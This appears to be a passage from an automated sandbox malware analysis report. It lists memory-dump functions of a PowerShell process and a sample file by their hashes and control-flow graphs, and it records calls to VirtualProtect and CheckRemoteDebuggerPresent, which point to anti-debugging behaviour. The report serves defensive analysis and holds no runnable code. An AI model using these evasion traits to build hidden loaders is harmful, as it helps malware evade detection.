                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: 7BD06270D042099F8780DFADC94156DFBF4EB48200F6085BE8919D7311E7715A12CBD1
                                                                                          Function 00BB8748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 975b815903fb05f409fdfa04a2c983ec8202d659a2abee8e3d242b6466c4a91f
                                                                                          • Instruction ID: 9f3a6cfbf6cd89d0bec5d81cc797ce3d9cdeacfa75b35492f0d54458a39f7b35
                                                                                          • Opcode Fuzzy Hash: 975b815903fb05f409fdfa04a2c983ec8202d659a2abee8e3d242b6466c4a91f
                                                                                          • Instruction Fuzzy Hash: 14D0173080410D8BCB08ABB4E85B4BDBB74FA10301F4001A9D91752290EF351A4ACBC0
                                                                                          Function 00BB8810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c3ce460fe99450086afa1edec24a89e7ec18ce432453a53e517005e0bee157d
                                                                                          • Instruction ID: 4cab379eb0c342c948198e9255578484fbc48067ee205702f4700baaa1d0ad2f
                                                                                          • Opcode Fuzzy Hash: 6c3ce460fe99450086afa1edec24a89e7ec18ce432453a53e517005e0bee157d
                                                                                          • Instruction Fuzzy Hash: B7D01734A0820E9BCB08EFB4E85687EBBF9BB44300F004169DA59D3380EA305901DBC1
                                                                                          Function 00BB7E90 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd3e5026d13ffa831b36585700257452c2e88d19377b71a9d316aa331e34cb5f
                                                                                          • Instruction ID: 6988a2fd5d88d059c395d78b1ab9f6af0450e551516b4e59cbdfbb377b08a3fe
                                                                                          • Opcode Fuzzy Hash: cd3e5026d13ffa831b36585700257452c2e88d19377b71a9d316aa331e34cb5f
                                                                                          • Instruction Fuzzy Hash: 19C04C1751E3D05FEF4347351C761493FB1999352470B89D2D881DB1B7C8588C1ACB62
                                                                                          Function 00BB7920 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 659834feb05758bc655d9438cfeae3a62a9bccbc4bde27bf2378cea4efa35b81
                                                                                          • Instruction ID: 4f6c79aceaf95f3a612da2ca646eb4d415dd7cc3369777a9eda1004c39cde8db
                                                                                          • Opcode Fuzzy Hash: 659834feb05758bc655d9438cfeae3a62a9bccbc4bde27bf2378cea4efa35b81
                                                                                          • Instruction Fuzzy Hash: 28C0803414D3849FC7065B7490508A47F149F8121570105DCD4475F9B7C9F3C445CF00
                                                                                          Function 00BB7928 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d0593aab4a59c8bdcc24767e34b164b799c700998848d6911851efb3cdd9ac6
                                                                                          • Instruction ID: 48cdb52c75c408edfa58aaf14856f66d21427c1f9ef0fd83277efc97183bce58
                                                                                          • Opcode Fuzzy Hash: 2d0593aab4a59c8bdcc24767e34b164b799c700998848d6911851efb3cdd9ac6
                                                                                          • Instruction Fuzzy Hash: 63B092301447088FC2496FB9A515814B32DAB8061578004A8E80E1A6A68EB6E894CA84

                                                                                          Non-executed Functions

                                                                                          Function 07243928 Relevance: 12.8, Strings: 10, Instructions: 324COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1448729859
                                                                                          • Opcode ID: aa4bdf7b6345eba6b96d3419ed06b04bb6dea2629a5909664c5321cdc1af5a8d
                                                                                          • Instruction ID: b08509d8b0823c17f35a4c39fb0997d59dcb19e96c14f5d9d51c01e1e8f81cd8
                                                                                          • Opcode Fuzzy Hash: aa4bdf7b6345eba6b96d3419ed06b04bb6dea2629a5909664c5321cdc1af5a8d
                                                                                          • Instruction Fuzzy Hash: 7AA168B27243569FDB29DB78C801766BFB2AFC6210F1480AAD545EB293DB31CC41C7A1
                                                                                          Function 07241BE0 Relevance: 11.7, Strings: 9, Instructions: 442COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ck$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq
                                                                                          • API String ID: 0-2178321549
                                                                                          • Opcode ID: 9afa8a2d2e1d6686641f2cba7602bdf0614c06cf01f3357d1007553c8e8366e8
                                                                                          • Instruction ID: 9621b27dba04586feb897f0a049a4cb71edb221795e9acf0028fe46bd6c50c98
                                                                                          • Opcode Fuzzy Hash: 9afa8a2d2e1d6686641f2cba7602bdf0614c06cf01f3357d1007553c8e8366e8
                                                                                          • Instruction Fuzzy Hash: 4DE14CB1B2434ACFCB298B698414667BBF6EFC6210F1580ABD545DF252DB31CC91C7A2
                                                                                          Function 07240FB2 Relevance: 11.4, Strings: 9, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$`Qfq$`Qfq$tPfq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-59738900
                                                                                          • Opcode ID: 9d96f5b58dda5060884f680624ad28b649f46c838ccbd9a4e8b27d41d49f1115
                                                                                          • Instruction ID: 37fb6bc12f2715d3dda16988cad0353696fb5e51e5817a639a4a1115bf86d994
                                                                                          • Opcode Fuzzy Hash: 9d96f5b58dda5060884f680624ad28b649f46c838ccbd9a4e8b27d41d49f1115
                                                                                          • Instruction Fuzzy Hash: 86617BB0A3420FDFDB2DCF48C544BAA7BB6AB45351F188095E8159B291C7B1DDE0CBA1
                                                                                          Function 00BBECD8 Relevance: 10.1, Strings: 8, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,jq$0omp$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3782670052
                                                                                          • Opcode ID: 84c5b1ae950b9ac3abebc4471fa8ba1a03c77158ee5a875974d238360dfb2a36
                                                                                          • Instruction ID: f10ce6c4dc314c98ff3bda576a4a58f1e200ccc3ab98a8fd57c60f17a8b691c6
                                                                                          • Opcode Fuzzy Hash: 84c5b1ae950b9ac3abebc4471fa8ba1a03c77158ee5a875974d238360dfb2a36
                                                                                          • Instruction Fuzzy Hash: 3B41FEA43040158FCB69AB7984995FD3BE6BF88B447241CEAD476CB3B2DEA4CC409752
                                                                                          Function 07243678 Relevance: 8.9, Strings: 7, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1664963280
                                                                                          • Opcode ID: 84bd52da3ac69509b393b8f5a19b5a509cc60e24d584bdd698d6109e76b6430f
                                                                                          • Instruction ID: ca400d98bafbc3a3a993cfc5ca73901989794f1fa026934b612037fb5d0d631c
                                                                                          • Opcode Fuzzy Hash: 84bd52da3ac69509b393b8f5a19b5a509cc60e24d584bdd698d6109e76b6430f
                                                                                          • Instruction Fuzzy Hash: 86513CF17242479FDB28DA798800766FBB6BFC2610F24806BD595EB283DB31C841CB91
                                                                                          Function 07240488 Relevance: 6.7, Strings: 5, Instructions: 495COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-1499809691
                                                                                          • Opcode ID: 4e72bdfc23b1176a0f67f7095aab3b760b48d300b9a3315aaa16fb4fdec0d8de
                                                                                          • Instruction ID: 57bdbe6d030deb4e43e8e88000046568c244f05b73733b4f95ec0a9036fa8fac
                                                                                          • Opcode Fuzzy Hash: 4e72bdfc23b1176a0f67f7095aab3b760b48d300b9a3315aaa16fb4fdec0d8de
                                                                                          • Instruction Fuzzy Hash: E2F12AB1B142568FC7399B78941176ABFA2EFC6210F1480FBD645CB252DB75CC81CBA1
                                                                                          Function 00BB7A09 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 1e467bb8ec1c71795470527bcd2ceb48718de035c1bcc88487b98e2926e4702f
                                                                                          • Instruction ID: b4ce04a4d27b757a8d726c046dc955cb13f811cc12007e8be8b24002c9678d23
                                                                                          • Opcode Fuzzy Hash: 1e467bb8ec1c71795470527bcd2ceb48718de035c1bcc88487b98e2926e4702f
                                                                                          • Instruction Fuzzy Hash: 3AB1B474E002099FCB55DFA9D990A9DFBF2FF88300F10866AE419AB345DB70A945CF90
                                                                                          Function 00BB7A18 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: d84820b74ae50a28d13cad66cd299d4a5ee92263f3b6e3b5fa36a60884185f04
                                                                                          • Instruction ID: d6ae805f325671210b135db2b0a867e30916cd8e8563cfff969c7c11b5df57d5
                                                                                          • Opcode Fuzzy Hash: d84820b74ae50a28d13cad66cd299d4a5ee92263f3b6e3b5fa36a60884185f04
                                                                                          • Instruction Fuzzy Hash: 2EB18374E002099FCB54DFA9D990A9DFBF2FF88300F108669E419AB345EB70A945CF90
                                                                                          Function 00BB7218 Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 9366832e688b135272da63a4dd987bc35a89509dc801651a11693a8ba06ffac5
                                                                                          • Instruction ID: aaa512b82b3ffdcea87e2953ab7833b671c1d0df52c070f17afd63ee3513c270
                                                                                          • Opcode Fuzzy Hash: 9366832e688b135272da63a4dd987bc35a89509dc801651a11693a8ba06ffac5
                                                                                          • Instruction Fuzzy Hash: D5916174E012099FDB54DFA9D590ADDFBF1FB88300F20866AE819AB305DB70A945CF90
                                                                                          Function 07245798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: 7a56846f6bb8074021b9a4f2553a01b716e3ba7ad688416811a53f11fdc55fbe
                                                                                          • Instruction ID: bd641a9482fc84db5a8b5d3a5a03c345d5c3a518d71971d092c44e5ca149bd2d
                                                                                          • Opcode Fuzzy Hash: 7a56846f6bb8074021b9a4f2553a01b716e3ba7ad688416811a53f11fdc55fbe
                                                                                          • Instruction Fuzzy Hash: C12149B17302179BDB3C597F88017277B9BABD0759F24803AE585CB281EE75C8908361
                                                                                          Function 07240308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 319764582014bddc7f32974c4603ba1dce3de1f81c696822609ff3af7589003e
                                                                                          • Instruction ID: bed27b66eccee324941e76fbedb357d867ecf06884eaab834bc4c6cc9162476c
                                                                                          • Opcode Fuzzy Hash: 319764582014bddc7f32974c4603ba1dce3de1f81c696822609ff3af7589003e
                                                                                          • Instruction Fuzzy Hash: 6801D66172A3C64FCB3B167818601662FF75F93A5071A40E7C181DF293CE298D8683A7

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5408 d70850 5409 d70859 5408->5409 5412 d73be2 5408->5412 5415 d734bd 5408->5415 5418 d788c0 5412->5418 5417 d788c0 VirtualProtect 5415->5417 5416 d734d6 5417->5416 5420 d788d3 5418->5420 5422 d78970 5420->5422 5423 d789b8 VirtualProtect 5422->5423 5425 d73bf8 5423->5425 5426 d78b40 5427 d78b80 CloseHandle 5426->5427 5429 d78bb1 5427->5429 5430 5682c50 5431 5682c6e 5430->5431 5434 5682dd0 5431->5434 5438 5682e08 5434->5438 5441 5682e02 5434->5441 5435 5682cbb 5439 5682e4c CheckRemoteDebuggerPresent 5438->5439 5440 5682e8e 5439->5440 5440->5435 5442 5682e4c CheckRemoteDebuggerPresent 5441->5442 5443 5682e8e 5442->5443 5443->5435

                                                                                          Executed Functions

                                                                                          Function 05748C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 5748c18-5748c83 call 5740040 call 574bf28 6 5748c89-574bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: f1844cdc62a7036537df677246b577fd3b5d060942a8a3b2cea975a2afcf4b1a
                                                                                          • Instruction ID: 8ead5f2abcc6fd67b7725c38e9105846d5fb5b757b7c32b255b82b80a94e3fee
                                                                                          • Opcode Fuzzy Hash: f1844cdc62a7036537df677246b577fd3b5d060942a8a3b2cea975a2afcf4b1a
                                                                                          • Instruction Fuzzy Hash: 88532C74A01219CFCB54DF64C99569EB7F2EB89305F5081E9D90EA7398DB389E81CF80
                                                                                          Function 05744DC3 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 778 5744dc3 779 5744dc7-5744dc9 778->779 780 5744dca-5744dcd 779->780 781 5744dce-5744dd3 780->781 782 5744e59-5744e67 780->782 781->782 783 5744e16-5744e29 781->783 784 5744e3c-5744e4d 781->784 785 5744f9d-5744fcb 781->785 786 574501e-5745020 781->786 787 5744f7f-5744f8d 781->787 788 5744e79-5744ea6 781->788 789 5744dda-5744e14 781->789 790 5744fdb-5744fee 781->790 791 5745040 781->791 792 574502c-574503e 781->792 793 5744e2e-5744e3a 781->793 794 5744eea 781->794 795 5744eab-5744ee5 781->795 782->787 800 5744e6d-5744e74 782->800 796 5744ff0-5745002 783->796 784->793 813 5744e4f-5744e54 784->813 785->794 821 5744fd1-5744fd6 785->821 786->791 798 5745022-574502a 786->798 787->788 809 5744f93-5744f98 787->809 788->780 789->780 790->796 803 574500c-5745015 792->803 793->780 808 5744ef6-5744f7a 794->808 795->780 796->803 798->803 800->779 803->792 811 5745017 803->811 808->780 809->780 811->786 811->791 811->792 813->780 821->780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq
                                                                                          • API String ID: 0-814193904
                                                                                          • Opcode ID: 227391c51712fedd71551d28e9fb2ad8d59eb4c914344c7d0df83c9c3c7ef36c
                                                                                          • Instruction ID: a825f4554f955871386fe56fb983e4caa162de006d004b3db1f6df693304b510
                                                                                          • Opcode Fuzzy Hash: 227391c51712fedd71551d28e9fb2ad8d59eb4c914344c7d0df83c9c3c7ef36c
                                                                                          • Instruction Fuzzy Hash: DD514974A44228CFDB24DF64D9947ADB7B2FB45700F508199E50AAB3A0DF345E81AF41
                                                                                          Function 0574BF50 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 829 574bf50-574bf74 830 574bf76-574bfd4 829->830 831 574bfdc-574bfe3 829->831 830->831 832 574bfe5-574c019 831->832 833 574c056-574c067 831->833 840 574c021-574c04a 832->840 834 574c06e-574c090 833->834 835 574c069 833->835 843 574c092-574c09b 834->843 844 574c0ff-574c194 call 5747550 834->844 835->834 867 574c1fc-574c24e 840->867 869 574c050 840->869 846 574c09d-574c0a2 843->846 847 574c0aa-574c0b0 843->847 857 574c1b5-574c1bb 844->857 846->847 851 574c0b6-574c0ba 847->851 852 574c1b0 847->852 851->844 855 574c0bc-574c0c5 851->855 852->857 859 574c0d4-574c0da 855->859 860 574c0c7-574c0cc 855->860 861 574c1c5 857->861 862 574c1bd 857->862 859->852 864 574c0e0-574c0fa 859->864 860->859 861->867 862->861 864->857 877 574c250-574c256 867->877 869->833 878 574c25c 877->878 879 574dfda-574dfde 877->879 878->879 880 574dfe4-574dfef 879->880 881 574ec87-574ec9e 879->881 880->877 885 574eca5-574eca7 881->885 886 574eca0 881->886 889 574eca9-574ecae 885->889 887 574eca2 886->887 888 574ec7e-574ec84 886->888 887->889 890 574eca4 887->890 888->881 891 574ecb5 889->891 892 574ecb0-574ecb2 889->892 890->885 895 574ecb7 891->895 896 574ed2b-574edb2 891->896 893 574ecb4 892->893 894 574ecb9-574ecc1 892->894 893->891 895->894 898 574edb4-574edb5 896->898 899 574edb9-574edd6 896->899 900 574ee2b-574ee30 898->900 901 574eddd-574edde 899->901 902 574edd8 899->902 903 574ee31-574ee3a 900->903 904 574ede5 901->904 905 574ede0-574ede2 901->905 906 574ee41 903->906 907 574ee3c-574ee3e 903->907 909 574ede9-574edf2 904->909 908 574ede4 905->908 905->909 912 574eeb7-574eeb8 906->912 913 574ee42 906->913 910 574ee45-574ee46 907->910 911 574ee40 907->911 908->904 914 574edf4 909->914 915 574edf9-574ee0a 909->915 919 574ee4d-574ee4e 910->919 920 574ee48 910->920 911->906 916 574eeb9 912->916 917 574ee43-574ee44 913->917 918 574ee49-574ee4a 913->918 921 574ee11-574ee15 915->921 922 574ee0c-574ee0d 915->922 923 574ef2f-574ef35 916->923 924 574eebb-574eec2 916->924 917->910 925 574ee51-574ee52 918->925 926 574ee4c 918->926 927 574ee55 919->927 928 574ee4f-574ee50 919->928 920->918 929 574ee17-574ee1e 921->929 930 574ee8b-574eea6 921->930 922->921 939 574ef37-574ef3e 923->939 940 574efab-574efc2 923->940 935 574eec4-574eec6 924->935 936 574eec9 924->936 933 574ee54 925->933 934 574ee59-574ee62 925->934 926->919 937 574ee57 927->937 938 574eecb 927->938 928->925 931 574ee25-574ee2a 929->931 932 574ee20 929->932 941 574eead 930->941 942 574eea8-574eeaa 930->942 931->900 931->903 932->931 933->927 945 574ee64 934->945 946 574ee69-574ee71 934->946 943 574eecd-574eed5 935->943 944 574eec8 935->944 936->938 937->934 938->943 947 574ef45 939->947 948 574ef40-574ef41 939->948 951 574efc4 940->951 952 574efc9-574efd5 940->952 949 574eeb1-574eeb2 941->949 942->949 950 574eeac 942->950 944->936 945->946 955 574eee7-574eeed 946->955 956 574ee73-574ee79 946->956 947->940 948->947 949->916 954 574eeb3-574eeb4 949->954 950->941 951->952 954->912 956->930
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 9392d29efd45f6283fdb7ffa2eba8624b770d355dae801c89c6cc1740fbcf19f
                                                                                          • Instruction ID: 19269b0107b53d6f98638e76b4f7fe638df551db7264c284b84d6d4e91752333
                                                                                          • Opcode Fuzzy Hash: 9392d29efd45f6283fdb7ffa2eba8624b770d355dae801c89c6cc1740fbcf19f
                                                                                          • Instruction Fuzzy Hash: 2AD15872A041148FCB25EF68D881AAD7BBAFB95220F59C678D802D7355DB31DC05EF82
                                                                                          Function 05682E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 963 5682e08-5682e8c CheckRemoteDebuggerPresent 965 5682e8e-5682e94 963->965 966 5682e95-5682ed0 963->966 965->966
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 05682E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265678354.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5680000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: e84a66972200fe4b531582efc6a1d90377cb65a218f7a0fbb0c839777b29dd2b
                                                                                          • Instruction ID: 62d211c510419e34cc0efe36091a85aec6202dadb569809739ef689457befb92
                                                                                          • Opcode Fuzzy Hash: e84a66972200fe4b531582efc6a1d90377cb65a218f7a0fbb0c839777b29dd2b
                                                                                          • Instruction Fuzzy Hash: 952125B18002598FCB10DF9AD884BEEBBF4AF48320F14845AE859A7350D778A944CF65
                                                                                          Function 05682E02 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 957 5682e02-5682e8c CheckRemoteDebuggerPresent 959 5682e8e-5682e94 957->959 960 5682e95-5682ed0 957->960 959->960
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 05682E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265678354.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5680000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: d6360315f8441e17f764a39f07ea9c8de9ce315b3d0ea51e0a91e0315dfcef0a
                                                                                          • Instruction ID: b6a0e80a975b3ea9f4b6461d72bbc47ac446ec7509b1ee6282cf9246f51cade8
                                                                                          • Opcode Fuzzy Hash: d6360315f8441e17f764a39f07ea9c8de9ce315b3d0ea51e0a91e0315dfcef0a
                                                                                          • Instruction Fuzzy Hash: 7B2116B18002598FCB10DF9AD485BEEBBF4AF48320F14845AE459A7250D778A944CF65
                                                                                          Function 00D78970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 969 d78970-d789f1 VirtualProtect 972 d789f3-d789f9 969->972 973 d789fa-d78a1f 969->973 972->973
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00D789E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2210877807.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_d70000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: b34dbfc272e271bfd87a19e6dc8462e1e079f96f97b8c8a12e5bd8f0c7f9ac8f
                                                                                          • Instruction ID: b650eeaa255bca39e68d4510258eb133089ce45cbf3b35a420dfad5cb3a7eb83
